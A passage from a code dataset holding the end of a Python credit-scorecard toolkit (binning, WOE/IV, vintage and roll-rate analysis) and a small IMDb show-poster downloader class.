#print(len(rst_s))\r\n return rst_s\r\n else:\r\n pass \r\n\r\ndef interval_trans(col,inputData,intervals):\r\n #rst_s = pd.Series()\r\n if col.strip() != \"\":\r\n rst_s = pd.Series(inputData[col].apply(bin_convar,values=intervals[col]).values.tolist())\r\n #rst_s = rst_s.reset_index(drop=True)\r\n rst_s.name = col + '_bin' \r\n #print('---------interval')\r\n #print(len(rst_s))\r\n return rst_s\r\n else:\r\n pass\r\n\r\ndef dataTransfer(inputData,intervals,nominal_intervals,multiprocess = False):\r\n '''\r\n Project the binning points back to corresponding variables \r\n and update the original dataset\r\n @Params: DataFrame,Dictionary,Dictionary\r\n '''\r\n if multiprocess != False:\r\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\r\n # deal with categorical variables\r\n multiple_results1 = [pool.apply_async(nominal_trans,(col,inputData,nominal_intervals)) for col in nominal_intervals.keys()]\r\n multiple_results2 = [pool.apply_async(interval_trans,(col,inputData,intervals)) for col in intervals.keys()]\r\n pool.close()\r\n pool.join()\r\n \r\n part1_df = pd.concat([s.get() for s in multiple_results1],axis=1)\r\n part2_df = pd.concat([s.get() for s in multiple_results2],axis=1)\r\n\r\n #part1_df.to_csv(\"part1_df.csv\")\r\n #part2_df.to_csv(\"part2_df.csv\")\r\n '''\r\n cnt = 0 \r\n for s in multiple_results2:\r\n if cnt == 0:\r\n part2_df = s.get()\r\n cnt += 1\r\n continue\r\n part2_df = pd.concat([part2_df,s.get()],axis=1)\r\n '''\r\n #inputData.to_csv(\"inputData.csv\")\r\n #part2_df.to_csv(\"part2_df.csv\")\r\n #part1_df.to_csv(\"part1_df.csv\")\r\n #print(\"inputData:\"+str(len(inputData)))\r\n #print(\"part1_df:\"+str(len(part1_df)))\r\n #print(\"part2_df:\"+str(len(part2_df)))\r\n inputData = inputData.reset_index(drop=True)\r\n inputData = pd.concat([inputData,part1_df,part2_df],axis=1)\r\n dataset_bin_df = pd.concat([part1_df,part2_df],axis=1)\r\n\r\n return inputData,dataset_bin_df\r\n\r\n else:\r\n for col in nominal_intervals.keys():\r\n if col.strip() == \"\":\r\n continue\r\n inputData[col+'_bin'] = inputData[col].apply(nominal_bin_convar,values=nominal_intervals[col])\r\n # deal with numerical variables\r\n for col in intervals.keys():\r\n if col.strip() == \"\":\r\n continue\r\n inputData[col+'_bin'] = inputData[col].apply(bin_convar,values=intervals[col])\r\n \r\n filter_flag = inputData.columns.str.endswith('_bin')\r\n dataset_bin_df = inputData.loc[:,filter_flag].copy()\r\n \r\n return inputData,dataset_bin_df\r\n\r\ndef nominal_bin_convar(x,values):\r\n x_new = None\r\n for i in range(len(values)):\r\n if len(values[i]) == 0:\r\n continue\r\n if x in values[i]:\r\n x_new = str(values[i])\r\n \r\n return x_new\r\n\r\ndef bin_convar(x,values):\r\n #values = [float(item) for item in values]\r\n x_new = None\r\n for i in range(len(values)-1):\r\n if x <= values[i+1] and x >= values[i]:\r\n x_new = str(values[i]) + '-' + str(values[i+1])\r\n #print(x_new)\r\n \r\n return x_new\r\n\r\ndef woe_single_x(x, y,EPS,event=1):\r\n \"\"\"\r\n Calculate woe and information(IV) for a single feature\r\n -----------------------------------------------\r\n Param \r\n x: 1-D pandas dataframe stands for single feature\r\n y: pandas Series contains binary variable\r\n event: value of binary stands for the event to predict\r\n -----------------------------------------------\r\n Return\r\n Dictionary contains woe values for categories of this feature\r\n Information value of this feature\r\n \"\"\"\r\n \r\n check_target_binary(y)\r\n\r\n event_total, non_event_total = count_binary(y, event=event)\r\n x_labels = x.unique()\r\n #x_labels = np.unique(x)\r\n woe_dict = {}\r\n iv = 0\r\n #Test\r\n #print(x.name) \r\n for x1 in x_labels:\r\n y1 = y[x == x1] \r\n #y1 = y[np.where(x == x1)[0]]\r\n event_count = y1.sum()\r\n non_event_count = len(y1) - event_count\r\n #event_count, non_event_count = count_binary(y1, event=event)\r\n \r\n #Test\r\n # print(x1)\r\n #print(\"event total {},non event total {}\".format(event_total,non_event_total))\r\n #print(\"event count {},non event count {}\".format(event_count,non_event_count))\r\n rate_event = 1.0 * event_count / event_total#\r\n rate_non_event = 1.0 * non_event_count / non_event_total#\r\n if rate_event == 0:#\r\n rate_event = EPS\r\n elif rate_non_event == 0:#\r\n rate_non_event = EPS\r\n else:\r\n pass\r\n #Notes: multiply 100 for comparation\r\n woe1 = math.log(rate_event / rate_non_event) \r\n #Test\r\n #print(woe1)\r\n woe_dict[x1] = woe1\r\n iv += (rate_event - rate_non_event) * woe1#\r\n \r\n return woe_dict, iv\r\n\r\ndef check_target_binary(y):\r\n \"\"\"\r\n check if the target variable is binary\r\n ------------------------------\r\n Param\r\n y:exog variable, pandas Series contains binary variable\r\n ------------------------------\r\n Return\r\n if y is not binary, raise a error \r\n \"\"\"\r\n y_type = type_of_target(y)\r\n if y_type not in ['binary']:\r\n raise ValueError('目标变量必须是二元的!')\r\n\r\ndef count_binary(a, event=1):\r\n \"\"\"\r\n calculate the cross table of a\r\n ------------------------------\r\n Params\r\n a: pandas Series contains binary variable\r\n event: treat event as 1, others as 0\r\n ------------------------------\r\n Return\r\n event_count: numbers of event=1\r\n non_event_count: numbers of event!=1\r\n \"\"\"\r\n event_count = (a == event).sum()\r\n non_event_count = a.shape[-1] - event_count\r\n \r\n return event_count, non_event_count\r\n \r\ndef _single_woe_trans(x, y,EPS):\r\n \"\"\"\r\n single var's woe trans\r\n ---------------------------------------\r\n Param\r\n x: single exog, pandas series\r\n y: endog, pandas series\r\n ---------------------------------------\r\n Return\r\n x_woe_trans: woe trans by x\r\n woe_map: map for woe trans\r\n info_value: infor value of x\r\n \"\"\"\r\n #cal_woe = WOE()\r\n woe_map, info_value = woe_single_x(x, y,EPS)\r\n x_woe_trans = x.map(woe_map)\r\n x_woe_trans.name = x.name + \"_WOE\"\r\n \r\n return x_woe_trans, woe_map, info_value\r\n\r\ndef woe_iter(var,df,y,EPS):\r\n woe_maps = {}\r\n iv_values = {}\r\n df = df.copy()\r\n\r\n x = df[var]\r\n x_woe_trans, woe_map, info_value = _single_woe_trans(x, y,EPS)\r\n #df = pd.concat([df, x_woe_trans], axis=1)\r\n woe_maps[var] = woe_map\r\n iv_values[var] = info_value\r\n\r\n return x_woe_trans,woe_maps,iv_values\r\n\r\ndef woe_trans(varnames, y, df,EPS,multiprocess=False):\r\n \"\"\"\r\n WOE translate for multiple vars\r\n ---------------------------------------\r\n Param\r\n varnames: list\r\n y: pandas series, target variable\r\n df: pandas dataframe, endogenous vars\r\n ---------------------------------------\r\n Return\r\n df: pandas dataframe, trans results\r\n woe_maps: dict, key is varname, value is woe\r\n iv_values: dict, key is varname, value is info value\r\n \"\"\"\r\n woe_maps = {}\r\n iv_values = {}\r\n \r\n if multiprocess != False:\r\n \r\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\r\n multiple_results = [pool.apply_async(woe_iter,(var,df,y,EPS)) for var in varnames]\r\n\r\n woe_df = None\r\n woe_maps = {}\r\n iv_values = {}\r\n for res in multiple_results:\r\n ds,woe_map,iv_value = res.get()\r\n woe_maps.update(woe_map)\r\n iv_values.update(iv_value)\r\n woe_df = pd.concat([ds,woe_df],axis=1)\r\n\r\n df = pd.concat([df,woe_df],axis=1)\r\n\r\n return df,woe_maps,iv_values\r\n\r\n else:\r\n woe_df = None\r\n for var in varnames:\r\n x = df[var]\r\n x_woe_trans, woe_map, info_value = _single_woe_trans(x, y,EPS)\r\n woe_df = pd.concat([x_woe_trans,woe_df], axis=1)\r\n woe_maps[var] = woe_map\r\n iv_values[var] = info_value\r\n '''\r\n if woe_df is None:\r\n woe_df = x_woe_trans.copy()\r\n else:\r\n woe_df = pd.concat([woe_df,x_woe_trans],axis=1)\r\n '''\r\n df = pd.concat([df,woe_df],axis=1) \r\n\r\n return df,woe_maps,iv_values\r\n \r\ndef get_bin_report(inputData,var_lst,target_var,*args):\r\n \"\"\"\r\n get auto_bin result description\r\n ---------------------------------------\r\n Param\r\n inputData: pandas DataFrame\r\n var_lst: python list[variable_names]\r\n args: woe_map,iv_values,desc_df \r\n ---------------------------------------\r\n Return\r\n pandas dataframe\r\n \"\"\"\r\n if len(args) == 2:\r\n woe_map = args[0]\r\n iv_values = args[1]\r\n elif len(args) == 3:\r\n desc_df = args[2]\r\n \r\n count_bad_total = inputData[target_var].sum()\r\n count_good_total = len(inputData) - count_bad_total\r\n outData = pd.DataFrame(columns=\r\n ['variable','value','count_bad','count_good','bad_rate','WOE','IV'])\r\n for var in var_lst:\r\n df = inputData.groupby(var+'_bin')[target_var].sum().to_frame().copy()\r\n df = df.rename(columns={target_var:'count_bad'})\r\n df = df.reset_index()\r\n df = df.rename(columns={var+'_bin':'value'})\r\n df['variable'] = var+'_bin'\r\n #TODO BUG\r\n df['count_good'] = inputData.groupby(var+'_bin')[target_var].count().values - inputData.groupby(var+'_bin')[target_var].sum().values\r\n df['bad_rate'] = df.count_bad / (df.count_bad + df.count_good)\r\n \r\n if var + '_bin' in iv_values:\r\n df.loc[df.variable == var+'_bin','IV'] = iv_values.get(var + '_bin') \r\n \r\n var_woe = woe_map.get(var + '_bin')\r\n for val in df.loc[df.variable == var + '_bin','value'].unique():\r\n df.loc[(df.variable == var + '_bin') & \r\n (df.value == val),'WOE'] = var_woe.get(val)\r\n \r\n df = df.reindex(['variable','value'\r\n ,'count_bad','count_good'\r\n ,'bad_rate','WOE','IV'],axis='columns')\r\n \r\n outData = outData.append(df)\r\n \r\n outData['count_good_total'] = count_good_total\r\n outData['count_bad_total'] = count_bad_total\r\n outData['count_bin'] = outData['count_bad'] + outData['count_good']\r\n outData['count_bin_pct'] = outData['count_bin'] / len(inputData)\r\n #outData['count_bin_pct'] = outData['count_bin_pct'].apply(lambda x: np.round(x,2))\r\n #outData['bad_rate'] = (outData['bad_rate']).apply(lambda x: np.round(x,2))\r\n \r\n outData = outData.reindex(['variable','value'\r\n ,'count_bad','count_good'\r\n ,'count_bin','count_bin_pct'\r\n ,'bad_rate','count_good_total'\r\n ,'count_bad_total','WOE','IV'],axis='columns')\r\n \r\n #map_dict = {}\r\n if len(args) == 3:\r\n for var in outData.variable[~outData.variable.duplicated()]:\r\n var = var.replace('_bin','')\r\n cur_desc = desc_df.loc[desc_df.variable == var,'desc'].values[0]\r\n cur_source = desc_df.loc[desc_df.variable == var,'source'].values[0]\r\n outData.at[outData.variable == var+'_bin','description'] = cur_desc\r\n outData.at[outData.variable == var+'_bin','source'] = cur_source\r\n #map_dict[var] = [cur_desc,cur_source]\r\n \r\n outData = outData.reindex(['variable','value'\r\n ,'description','source'\r\n ,'count_bad','count_good'\r\n ,'count_bin','count_bin_pct'\r\n ,'bad_rate','count_good_total'\r\n ,'count_bad_total','WOE','IV'],axis='columns')\r\n \r\n return outData\r\n\r\ndef varclus_join_iv(fa_rst,iv_values):\r\n '''\r\n Merge the varclus result dataframe with IV values \r\n '''\r\n index = 0\r\n for col in fa_rst.Variables:\r\n col = col.replace('_WOE','')\r\n print(col)\r\n if col in iv_values.keys():\r\n print(col)\r\n fa_rst.ix[index,'IV'] = iv_values.get(col)\r\n index += 1\r\n \r\n return fa_rst\r\n\r\ndef out_data_report(data_report,intervals,nominal_intervals):\r\n '''\r\n Output the data_report includes\r\n data description,data source,bad counts,bad rate,woe and iv values \r\n --------------------------------------------------\r\n @Params: \r\n DataFrame: data_report\r\n Dictionary: split points of numerical attributes\r\n Dictionary: split points of nominal attributes\r\n '''\r\n data_report.to_excel(\"data_report.xlsx\")\r\n \r\n for k in intervals.keys():\r\n intervals[k] = [str(i) for i in intervals[k]]\r\n intervals[k] = ';'.join(intervals[k])\r\n \r\n for k in nominal_intervals.keys():\r\n count = 1\r\n for row in nominal_intervals[k]:\r\n if count == 1:\r\n rst = ','.join(row) + ';'\r\n count += 1\r\n continue\r\n rst += ','.join(row) \r\n rst += ';'\r\n nominal_intervals[k] = rst \r\n \r\n with open('intervals.csv','w') as f:\r\n w = csv.writer(f)\r\n w.writerow(['Attribute','Split Points'])\r\n w.writerows(intervals.items())\r\n \r\n with open('nominals.csv','w') as f:\r\n w = csv.writer(f)\r\n w.writerow(['Attribute','Split Points'])\r\n w.writerows(nominal_intervals.items())\r\n\r\ndef manual_intervals():\r\n '''\r\n Read in updated manual binning results \r\n and save as appropriate data structure for later usage\r\n @Return:\r\n Dictionary: intervals\r\n Dictionary: nominal intervals\r\n '''\r\n intervals_file = 'intervals.csv'\r\n nominal_file = 'nominals.csv'\r\n \r\n with open(intervals_file,'r') as f:\r\n reader = csv.DictReader(f)\r\n intervals = {}\r\n intervals = {row['Attribute'] : row['Split Points'] for row in reader}\r\n \r\n with open(nominal_file,'r') as f:\r\n reader = csv.DictReader(f)\r\n nominal_intervals = {}\r\n nominal_intervals = {row['Attribute'] : row['Split Points'] for row in reader}\r\n \r\n \r\n for col in intervals.keys():\r\n if col.strip() == \"\":\r\n continue\r\n intervals[col] = intervals[col].split(';')\r\n #print(intervals[col])\r\n \r\n \r\n intervals[col] = [float(i) for i in intervals[col] if i != '']\r\n \r\n for col in nominal_intervals.keys():\r\n nominal_intervals[col] = nominal_intervals[col].split(';')\r\n nominal_intervals[col] = [row.split(',') for row in nominal_intervals[col]]\r\n nominal_intervals[col] = [row for row in nominal_intervals[col] if len(row[0]) != 0]\r\n \r\n return intervals,nominal_intervals\r\n\r\ndef signal_func(x):\r\n if np.isnan(x):\r\n return np.nan\r\n elif float(x) > 10:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef plot_vintage(inputData,columns,period):\r\n #Calculate per loan month cumulative delq\r\n vintage_cum_df = inputData.cumsum(axis=1).copy()\r\n vintage_df = inputData.copy()\r\n #print(vintage_cum_df.values.shape,len(columns))\r\n vintage_cum_arr = np.round(vintage_cum_df.values / vintage_cum_df.iloc[:,-1].values.reshape((len(vintage_cum_df),-1))*100,2)\r\n vintage_arr = np.round(vintage_df.values / vintage_df.sum(axis=1).values.reshape(len(vintage_df),-1)*100,2)\r\n rst_cum_df = pd.DataFrame(vintage_cum_arr,columns=columns)\r\n rst_df = pd.DataFrame(vintage_arr,columns=columns)\r\n #Cumulative vintage\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1,1,1)\r\n \r\n if isinstance(period,int):\r\n for i in range(period):\r\n rst_cum_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i+1) for i in range(period)])\r\n elif len(period) and isinstance(period,(list,tuple,set)) == 2:\r\n mth_lst = np.linspace(period[0],period[1],period[1]-period[0]+1) \r\n for i in mth_lst:\r\n rst_cum_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i) for i in mth_lst]) \r\n \r\n plt.xticks(range(len(columns)),columns,rotation=90)\r\n fig.savefig('vintage_cum.png')\r\n writer = pd.ExcelWriter('vr_analysis.xlsx',engine='xlsxwriter')\r\n sheet = writer.book.add_worksheet('vintage_sheet') \r\n sheet.insert_image(0,0,'vintage_cum.png')\r\n \r\n # Plot each Mob vintage\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1,1,1)\r\n \r\n if isinstance(period,int):\r\n for i in range(period):\r\n rst_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i+1) for i in range(period)])\r\n elif len(period) and isinstance(period,(list,tuple,set)) == 2:\r\n mth_lst = np.linspace(period[0],period[1],period[1]-period[0]+1) \r\n for i in mth_lst:\r\n rst_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i) for i in mth_lst]) \r\n \r\n plt.xticks(range(len(columns)),columns,rotation=90)\r\n fig.savefig('vintage.png')\r\n #writer = pd.ExcelWriter('vr_analysis.xlsx',engine='xlsxwriter')\r\n #sheet = writer.book.add_worksheet('vintage_sheet') \r\n sheet.insert_image(0,10,'vintage.png')\r\n \r\n return rst_cum_df,rst_df,writer\r\n \r\ndef vintage(dataset,period,by='d'):\r\n \r\n if not isinstance(dataset,pd.DataFrame):\r\n raise TypeError(\"Input must be a Pandas DataFrame...\")\r\n #Chosse finished orders\r\n dataset = dataset.loc[dataset['status'] == 2,:].copy()\r\n #Get loan month\r\n dataset['out_loan_mth'] = dataset['loan_time'].str[5:7]\r\n dataset.drop(['app_no','loan_time','app_year'],axis=1,inplace=True)\r\n dataset['dlq_day_lst'] = dataset['dlq_day_lst'].str.replace(r'[\\[\\]]','')\r\n dataset['dlq_amount_lst'] = dataset['dlq_amount_lst'].str.replace(r'[\\[\\]]','')\r\n if by == 'd':\r\n contents = dataset['dlq_day_lst'].str.split(',',expand=True)\r\n col_names = {}\r\n for col in contents.columns:\r\n if col not in col_names:\r\n col_names[col] = 'Mob_{}'.format(str(col+1))\r\n contents.rename(columns=col_names,inplace=True)\r\n dataset = dataset.join(contents).copy()\r\n columns = dataset.columns[dataset.columns.str.contains('Mob_')]\r\n for col in columns:\r\n dataset[col] = dataset[col].astype('float')\r\n dataset.loc[:,columns] = dataset.loc[:,columns].applymap(signal_func)\r\n dataset.drop(['dlq_day_lst'],axis=1,inplace=True)\r\n vintage_df = dataset.groupby('out_loan_mth')[columns].sum()\r\n rst_cum_df,rst_df,writer = plot_vintage(vintage_df,columns,period)\r\n\r\n elif by == 'amt':\r\n contents = dataset['dlq_amount_lst'].str.split(',',expand=True)\r\n col_names = {}\r\n for col in contents.columns:\r\n if col not in col_names:\r\n col_names[col] = 'Dlq_amount_{}'.format(str(col+1))\r\n contents.rename(columns=col_names,inplace=True)\r\n dataset = dataset.join(contents).copy()\r\n dlq_cols = dataset.columns[dataset.columns.str.contains('Dlq_amount')]\r\n #print(dlq_cols)\r\n for col in dlq_cols:\r\n #TODO\r\n dataset[col] = dataset[col].astype('float')\r\n dataset.drop(['dlq_amount_lst'],axis=1,inplace=True)\r\n vintage_amt_df = dataset.groupby('out_loan_mth')[dlq_cols].sum()\r\n rst_cum_df,rst_df,writer = plot_vintage(vintage_amt_df,dlq_cols,period)\r\n else:\r\n raise Exception(\"Not valid parameter input...\")\r\n \r\n return rst_cum_df,rst_df,writer\r\n\r\ndef rollrate(dataset,mob_pnt,span,writer):\r\n \r\n rollRate_results = []\r\n if not isinstance(dataset,pd.DataFrame):\r\n raise TypeError(\"Input must be a Pandas DataFrame...\")\r\n #Choose finished orders\r\n dataset = dataset.loc[dataset.status == 2,:].copy()\r\n #Calculate total term of each contract\r\n dataset['term'] = dataset['dlq_day_lst'].str.count(',') + 1\r\n dataset['out_loan_mth'] = dataset['loan_time'].str[5:7]\r\n unique_mths = dataset['out_loan_mth'].unique()\r\n for mth in unique_mths.tolist():\r\n rst = roll_rate_cal(dataset.loc[dataset['out_loan_mth'] == mth,:].copy(),mob_pnt,span)\r\n rollRate_results.append(rst)\r\n \r\n rst_all = roll_rate_cal(dataset.copy(),mob_pnt,span)\r\n \r\n fig = plt.figure(figsize=(20,6))\r\n ax = fig.add_subplot(1,1,1)\r\n rst_all.plot.barh(stacked=True,ax=ax)\r\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\r\n ncol=2, mode=\"expand\", borderaxespad=0.)\r\n \r\n fig.savefig('rollrate.png')\r\n #writer = pd.ExcelWriter('vr_analysis.xlsx',engine='xlsxwriter')\r\n sheet = writer.book.add_worksheet('rollrate_sheet')\r\n sheet.insert_image(0,0,'rollrate.png') \r\n writer.save()\r\n \r\n return rollRate_results,rst_all\r\n\r\ndef roll_rate_cal(dataset,mob_pnt,span):\r\n \r\n \r\n dataset['dlq_day_lst'] = dataset['dlq_day_lst'].str.replace(r'[\\[\\]]','')\r\n #After loan behaviour list\r\n contents = dataset['dlq_day_lst'].str.split(',',expand=True)\r\n col_names = {}\r\n for col in contents.columns:\r\n if col not in col_names:\r\n col_names[col] = 'Mob_{}'.format(str(col+1))\r\n contents.rename(columns=col_names,inplace=True)\r\n dataset = dataset.join(contents).copy()\r\n col_names = dataset.columns[dataset.columns.str.contains('Mob_')]\r\n #Transfer Mob data types to float\r\n for col in col_names:\r\n dataset[col] = dataset[col].astype('float')\r\n dataset.drop(['status','app_year','loan_time'],axis=1,inplace=True)\r\n left = mob_pnt - span\r\n right = mob_pnt + span\r\n #Check if the specified mob and span are appropriate\r\n dataset['is_inrange'] = (left > 0) & (right <= dataset['term'])\r\n if ~dataset['is_inrange'].all():\r\n raise Exception(\"Column specified out of Mob span...\")\r\n else:\r\n s_bf = dataset.loc[:,'Mob_1':'Mob_{0}'.format(mob_pnt)].sum(axis=1)\r\n s_af = dataset.loc[:,'Mob_{0}'.format(mob_pnt+1):'Mob_{0}'.format(right)].sum(axis=1)\r\n dataset['count_dlq_pnt_bf'.format(mob_pnt)] = s_bf\r\n dataset['count_dlq_pnt_af'.format(mob_pnt)] = s_af\r\n \r\n norm_af_flag = (dataset['count_dlq_pnt_af'] >= 0) & (dataset['count_dlq_pnt_af'] <= 10)\r\n one_af_flag = (dataset['count_dlq_pnt_af'] > 10) & (dataset['count_dlq_pnt_af'] <= 20)\r\n two_af_flag = (dataset['count_dlq_pnt_af'] > 20) & (dataset['count_dlq_pnt_af'] <= 30)\r\n three_af_flag = dataset['count_dlq_pnt_af'] > 30\r\n\r\n dataset.loc[norm_af_flag,'flag_af'] = 'normal'\r\n dataset.loc[one_af_flag,'flag_af'] = 'dlq_1'\r\n dataset.loc[two_af_flag,'flag_af'] = 'dlq_2'\r\n dataset.loc[three_af_flag,'flag_af'] = 'dlq_3'\r\n\r\n norm_bf_flag = (dataset['count_dlq_pnt_bf'] >= 0) & (dataset['count_dlq_pnt_bf'] <= 10)\r\n one_bf_flag = (dataset['count_dlq_pnt_bf'] > 10) & (dataset['count_dlq_pnt_bf'] <= 20)\r\n two_bf_flag = (dataset['count_dlq_pnt_bf'] > 20) & (dataset['count_dlq_pnt_bf'] <= 30)\r\n three_bf_flag = dataset['count_dlq_pnt_bf'] > 30\r\n \r\n dataset.loc[norm_bf_flag,'flag_bf'] = 'normal'\r\n dataset.loc[one_bf_flag,'flag_bf'] = 'dlq_1'\r\n dataset.loc[two_bf_flag,'flag_bf'] = 'dlq_2'\r\n dataset.loc[three_bf_flag,'flag_bf'] = 'dlq_3'\r\n\r\n dataset = dataset.loc[:,['app_no','flag_bf','flag_af']]\r\n results = pd.pivot_table(dataset,index='flag_bf',columns='flag_af',aggfunc='count')\r\n #results.columns = ['dlq_1','dlq_2','dlq_3','normal']\r\n\r\n statistic = results.sum(axis=1).values.reshape((len(results),-1))\r\n rst = results.values / statistic *100\r\n results = pd.DataFrame(np.round(rst,2),index=results.index.tolist(),\r\n columns=results.columns.tolist())\r\n \r\n return results\r\n\r\ndef calculate_score(dataset,y_variable,appcode=None):\r\n #cols_woe = dataset.columns[dataset.columns.str.endswith('_WOE')].values.tolist()\r\n Y = dataset[y_variable]\r\n dataset.columns\r\n if appcode is None:\r\n X = dataset.drop([y_variable],axis=1)\r\n else:\r\n X = dataset.drop([y_variable,appcode],axis=1)\r\n X1 = sm.add_constant(X)\r\n logit = sm.Logit(Y,X1)\r\n result = logit.fit()\r\n \r\n coe = result.params\r\n PDO = 40\r\n P0 = 600\r\n theta0 = 0.08\r\n B = PDO / math.log(2)\r\n A = P0 + B * math.log(theta0)\r\n #'''\r\n dataset['score'] = A - B * coe['const']\r\n x_variables = dataset.columns[dataset.columns.str.endswith('_WOE')].values.tolist()\r\n for i in x_variables:\r\n #print(i)\r\n #print(coe[i])\r\n dataset['score'] = dataset['score'] - B * coe[i] * dataset[i]\r\n #'''\r\n return \r\n\r\nif __name__ == '__main__':\r\n \r\n #以人行数据举例Demo:\r\n \r\n #第一步:整理建模数据集\r\n model_data = pd.read_pickle(\"model_data.pkl\")\r\n model_data['ln_cc_mob_max'] = model_data[['ln_mob', 'cc_mob']].max(axis = 1)\r\n model_data_thick = model_data[model_data['ln_cc_mob_max'].notnull()].copy()\r\n #选择X变量\r\n chosen_vars = ['cl_query_self','ln_query_corp_cnt_lst_12m'\r\n ,'cc_uclose_um_mob','cl_query_cnt_lst_12m'\r\n ,'cc_limit3_act','hz_cnt_ln'\r\n ,'hz_houseloancount','dm_maritalstate']\r\n #拼接上目标变量Y\r\n dataset = model_data_thick.loc[:,chosen_vars].join(model_data_thick.loc[:,['fspd30_recalled']])\r\n #剔除字符型变量中唯一值超过100个或数值型变量中只存在唯一值的特征变量\r\n cols2drop = variableFilter(dataset,100)\r\n dataset.drop(cols2drop,axis=1,inplace=True)\r\n #保存字符型变量列表\r\n nominal_vars = getNominalVars(dataset)\r\n #处理缺失值\r\n dataset.loc[:,nominal_vars] = dataset.loc[:,nominal_vars].fillna('NaN')\r\n numerical_vars = [col for col in dataset.columns if col not in nominal_vars]\r\n numerical_vars.remove('fspd30_recalled')\r\n dataset.loc[:,numerical_vars] = dataset.loc[:,numerical_vars].fillna(-9999)\r\n #保存X变量名称列表\r\n x_vars = nominal_vars + numerical_vars \r\n inputData = dataset.copy()\r\n \r\n #第二步:使用工具集进行自动分箱\r\n intervals,nominal_intervals,inputData = discrete(inputData,nominal_vars,6,True)\r\n\r\n #第三步:将分箱结果映射回源数据集,生成对应bin特征\r\n ds,dataset_bin_df = dataTransfer(inputData.copy(),intervals,nominal_intervals,True)\r\n\r\n #第四步:对各自分bin计算WOE值\r\n bin_vars = [col+'_bin' for col in x_vars]\r\n df,woe_maps,iv_values = woe_trans(bin_vars,ds['fspd30_recalled'],ds,EPS=1e-8,multiprocess=True)\r\n \r\n #第五步:Varclus运算\r\n cols_woe = df.columns[df.columns.str.endswith('bin_WOE')].values.tolist()\r\n df_t = df.loc[:,cols_woe]\r\n fa_obj = varclus_analysis.FeatureSelection.load_data(df_t)\r\n fa_obj.varclus()\r\n fa_rst = fa_obj.show()\r\n fa_rst = varclus_join_iv(fa_rst,iv_values)\r\n print(fa_rst)\r\n\r\n #最后:KS计算\r\n woe_vars = [col+'_bin_WOE' for col in x_vars]\r\n model_data_woe = df.loc[:,woe_vars+['fspd30_recalled']].copy()\r\n #构造训练集和检验集\r\n X_train,X_test,y_train,y_test = train_test_split(model_data_woe.drop('fspd30_recalled',axis=1),\r\n model_data_woe['fspd30_recalled'],test_size=0.33,random_state=42)\r\n sample_dev = X_train.join(y_train)\r\n sample_vld = X_test.join(y_test)\r\n helper.logit_fit(sample_dev,'fspd30_recalled',woe_vars, title = 'Fitting Dev Sample', plot_text = 'Fitting Dev Sample')\r\n helper.logit_fit(sample_vld, 'fspd30_recalled', woe_vars, title = 'Refitting Validation', plot_text = 'Refitting Validation')\r\n \r\n ","sub_path":"scorecard_kit.py","file_name":"scorecard_kit.py","file_ext":"py","file_size_in_byte":43493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"130976352","text":"#!/usr/bin/env python\n\"\"\"\nImdb Watcher\nMike Tung\n\"\"\"\n\nfrom imdbpie import Imdb\nimport os\nimport urllib.request\nimport urllib\n\nclass Watcher:\n def __init__(self):\n self.imdb = Imdb(anonymize=True)\n self.tracked_shows = self.get_shows()\n self.static_dir = os.path.join(os.path.dirname(__file__), '../static/images')\n\n def get_shows(self):\n \"\"\"\n gets all current popular shows from imdb\n \"\"\"\n shows = self.imdb.popular_shows()\n tracked_shows = []\n for show in shows:\n tracked_shows_d = {}\n tracked_shows_d['id'] = show['tconst']\n tracked_shows_d['title'] = show['title']\n tracked_shows_d['poster'] = show['image']['url']\n tracked_shows.append(tracked_shows_d)\n return tracked_shows\n\n def get_show_id(self, show_title):\n \"\"\"\n Gets show title id\n\n args:\n\n show_title: name of show to be queried\n\n returns:\n\n show_id: id of show\n \"\"\"\n\n for show in self.tracked_shows:\n if show_title == show['title']:\n return show['id']\n\n def get_episodes(self, show_id):\n \"\"\"\n Gets all episodes of a given show\n\n args:\n\n show_id: tconst id from imdb\n\n returns:\n\n ist of episodes\n \"\"\"\n return self.imdb.get_episodes(show_id)\n\n def get_all_episodes(self):\n \"\"\"\n Gets all episodes\n\n args:\n\n None\n\n returns:\n\n list of episodes for all shows\"\"\"\n\n programs = {}\n for show in self.tracked_shows:\n programs[show['title']] = self.get_episodes(show['id'])\n\n return programs\n\n def get_poster(self, show_title):\n \"\"\"\n gets the img url for the poster of a show\n\n args:\n\n show_title: title of show\n\n returns:\n\n dictionary with {show_title: poster_url}\n \"\"\"\n\n #print(self.tracked_shows[show_id]['poster'])\n for show in self.tracked_shows:\n if show['title'] == show_title:\n return {show_title : show['poster']}\n\n def save_posters(self, urls, title):\n title = self.sanitize_title(title)\n dest = '{}/{}.jpg'.format(self.static_dir, title)\n urllib.request.urlretrieve(url, dest)\n\n def sanitize_title(self, title):\n forbidden = ('<', '>', ':', '\"', '/', '\\\\', '|', '?', '*')\n for char in forbidden:\n title = title.replace(char, '')\n return title\n\n def get_show_titles(self):\n \"\"\"\n Gets show titles\n\n args:\n\n None\n\n returns:\n\n list of show titles\n \"\"\"\n\n return [show['title'] for show in self.tracked_shows]\n\nif __name__ == '__main__':\n a = Watcher()\n titles = a.get_show_titles()\n for t in titles:\n posters_dict = a.get_poster(t)\n for title, url in posters_dict.items():\n a.save_posters(url, title)\n","sub_path":"watchdog/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
